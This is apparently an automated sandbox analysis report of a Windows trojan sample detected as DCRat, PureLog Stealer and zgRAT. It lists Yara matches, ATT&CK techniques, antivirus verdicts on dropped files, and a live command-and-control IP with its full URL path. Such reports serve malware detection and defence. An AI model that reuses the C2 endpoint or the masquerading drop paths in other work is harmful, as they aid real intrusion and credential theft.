Source: Yara match	File source: 0000000C.00000002.3319845623.00000000039E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3319845623.0000000003B8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2204609907.00000000130C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Providerbroker.exe PID: 6204, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BSlvAOjamepaXWJMhY.exe PID: 5148, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 9FwQYJSj4N.exe, type: SAMPLE
Source: Yara match	File source: 0.3.9FwQYJSj4N.exe.49354fb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.9FwQYJSj4N.exe.49364fb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.9FwQYJSj4N.exe.49354fb.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.9FwQYJSj4N.exe.49364fb.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Providerbroker.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2080050228.00000000048E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2080638886.00000000048E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2131916065.0000000000452000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: C:\Windows\PrintDialog\pris\spoolsv.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\ApplicationFrameHost.exe, type: DROPPED
Source: Yara match	File source: C:\providerBrowserruntimeCrt\Providerbroker.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 9FwQYJSj4N.exe, type: SAMPLE
Source: Yara match	File source: 0.3.9FwQYJSj4N.exe.49354fb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.9FwQYJSj4N.exe.49364fb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.9FwQYJSj4N.exe.49354fb.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.9FwQYJSj4N.exe.49364fb.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Providerbroker.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Windows\PrintDialog\pris\spoolsv.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\ApplicationFrameHost.exe, type: DROPPED
Source: Yara match	File source: C:\providerBrowserruntimeCrt\Providerbroker.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	141 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	12 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	157 System Information Discovery	SMB/Windows Admin Shares	1 Clipboard Data	11 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Software Packing	NTDS	361 Security Software Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	133 Masquerading	Cached Domain Credentials	261 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	261 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
9FwQYJSj4N.exe	60%	Virustotal		Browse
9FwQYJSj4N.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
9FwQYJSj4N.exe	100%	Avira	VBS/Runner.VPG
9FwQYJSj4N.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe	100%	Avira	HEUR/AGEN.1339906
C:\Users\user\Desktop\BqwHRBKU.log	100%	Avira	HEUR/AGEN.1300079
C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe	100%	Avira	HEUR/AGEN.1339906
C:\Users\user\Desktop\RRtweJUq.log	100%	Avira	HEUR/AGEN.1300079
C:\Users\user\Desktop\NsJXliNz.log	100%	Avira	HEUR/AGEN.1362695
C:\Users\user\Desktop\BmbzgENi.log	100%	Avira	HEUR/AGEN.1300079
C:\Users\user\AppData\Local\Temp\Ze4zcGVeMm.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\GidQnkDb.log	100%	Avira	TR/AD.BitpyRansom.lcksd
C:\Users\user\Desktop\QURoIJFv.log	100%	Avira	TR/AVI.Agent.updqb
C:\Recovery\ApplicationFrameHost.exe	100%	Avira	HEUR/AGEN.1339906
C:\Users\user\Desktop\HrJyYQpO.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\NJzXBuON.log	100%	Joe Sandbox ML
C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\BqwHRBKU.log	100%	Joe Sandbox ML
C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\VIjnlGUj.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\AtVzwBvZ.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\RRtweJUq.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\NsJXliNz.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\BmbzgENi.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\HjZguhPI.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\HAgyIDIK.log	100%	Joe Sandbox ML
C:\Recovery\ApplicationFrameHost.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\VMyxesyD.log	100%	Joe Sandbox ML
C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Windows Photo Viewer\en-GB\BSlvAOjamepaXWJMhY.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Recovery\ApplicationFrameHost.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\AtVzwBvZ.log	16%	ReversingLabs
C:\Users\user\Desktop\BmbzgENi.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\BqwHRBKU.log	4%	ReversingLabs
C:\Users\user\Desktop\CEfhBXTR.log	8%	ReversingLabs
C:\Users\user\Desktop\DCGpXXhM.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\FkBISkog.log	3%	ReversingLabs
C:\Users\user\Desktop\GidQnkDb.log	33%	ReversingLabs	Win32.Ransomware.Bitpy
C:\Users\user\Desktop\HAgyIDIK.log	5%	ReversingLabs
C:\Users\user\Desktop\HjZguhPI.log	8%	ReversingLabs
C:\Users\user\Desktop\HrJyYQpO.log	8%	ReversingLabs
C:\Users\user\Desktop\IZCgKuwL.log	21%	ReversingLabs
C:\Users\user\Desktop\JXdofuLG.log	25%	ReversingLabs
C:\Users\user\Desktop\JkPyJTHW.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\KYTGugDU.log	25%	ReversingLabs
C:\Users\user\Desktop\LVvPQgSP.log	8%	ReversingLabs
C:\Users\user\Desktop\MebxBNFC.log	3%	ReversingLabs
C:\Users\user\Desktop\NJzXBuON.log	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\NkZFHznt.log	17%	ReversingLabs
C:\Users\user\Desktop\NsJXliNz.log	17%	ReversingLabs
C:\Users\user\Desktop\QURoIJFv.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\QzpNJrOH.log	12%	ReversingLabs
C:\Users\user\Desktop\RRtweJUq.log	17%	ReversingLabs
C:\Users\user\Desktop\RbQwOwnn.log	8%	ReversingLabs
C:\Users\user\Desktop\STjOtvME.log	17%	ReversingLabs
C:\Users\user\Desktop\VIjnlGUj.log	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\VMyxesyD.log	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\VWRNVcdg.log	33%	ReversingLabs	Win32.Ransomware.Bitpy
C:\Users\user\Desktop\WJZFAsNx.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\WsSnlWTv.log	9%	ReversingLabs
C:\Users\user\Desktop\YYEvrLib.log	29%	ReversingLabs
C:\Users\user\Desktop\YuFVHGXq.log	21%	ReversingLabs
C:\Users\user\Desktop\bnUEsCJp.log	16%	ReversingLabs
C:\Users\user\Desktop\dpGmOlNk.log	8%	ReversingLabs
C:\Users\user\Desktop\fneLqjpL.log	25%	ReversingLabs
C:\Users\user\Desktop\fwOdVSPR.log	9%	ReversingLabs
C:\Users\user\Desktop\gCMlaExJ.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\hgxdViOd.log	25%	ReversingLabs
C:\Users\user\Desktop\ihttcfaK.log	12%	ReversingLabs
C:\Users\user\Desktop\jaztMisT.log	29%	ReversingLabs
C:\Users\user\Desktop\ksDciByC.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\lWnUcfOW.log	25%	ReversingLabs
C:\Users\user\Desktop\lkWuMAXT.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\oVBKTOiM.log	8%	ReversingLabs
C:\Users\user\Desktop\oitSpyyv.log	21%	ReversingLabs
C:\Users\user\Desktop\rOQtFLTL.log	8%	ReversingLabs
C:\Users\user\Desktop\rxJbrpZI.log	21%	ReversingLabs
C:\Users\user\Desktop\tRDbbuYG.log	5%	ReversingLabs
C:\Users\user\Desktop\uwXRiYty.log	17%	ReversingLabs
C:\Users\user\Desktop\wDeIoEvg.log	25%	ReversingLabs
C:\Users\user\Desktop\wHtSiqYz.log	4%	ReversingLabs
C:\Users\user\Desktop\yEUaDqnu.log	17%	ReversingLabs
C:\Users\user\Desktop\zFRrKozb.log	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\zOoquaSY.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\zsYipEjs.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Windows\PrintDialog\pris\spoolsv.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\providerBrowserruntimeCrt\Providerbroker.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Name	Malicious	Antivirus Detection	Reputation
http://89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://ac.ecosia.org/autocomplete?q=	BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.dr	false	high
https://duckduckgo.com/chrome_newtab	BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.dr	false	high
https://duckduckgo.com/ac/?q=	BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.dr	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.dr	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.dr	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.dr	false	high
http://89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlon	BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003665000.00000004.00000800.00020000.00000000.sdmp	true	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.dr	false	high
http://89.23.96.180	BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003665000.00000004.00000800.00020000.00000000.sdmp	true	unknown
https://www.ecosia.org/newtab/	BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.dr	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Providerbroker.exe, 00000005.00000002.2199739543.000000000331A000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003477000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
89.23.96.180	unknown	Russian Federation		48687	MAXITEL-ASRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1579262
Start date and time:	2024-12-21 10:01:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	9FwQYJSj4N.exe renamed because original name is a hash value
Original Sample Name:	9342BE038F6FF329AAFFDC2626F8D145.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@18/326@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197, 23.218.208.109
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:02:31	API Interceptor	1004612x Sleep call for process: BSlvAOjamepaXWJMhY.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MAXITEL-ASRU	bPkG0wTVon.exe	Get hash	malicious	Unknown	Browse	89.23.100.233
	itLDZwgFNE.exe	Get hash	malicious	Flesh Stealer	Browse	89.23.100.233
	3gJQoqWpxb.bat	Get hash	malicious	Unknown	Browse	89.23.100.233
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc	Browse	89.23.100.42
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	89.23.100.42
	7fE6IkvYWf.exe	Get hash	malicious	Unknown	Browse	89.23.100.233
	iGxCM2I5u9.exe	Get hash	malicious	Flesh Stealer	Browse	89.23.100.233
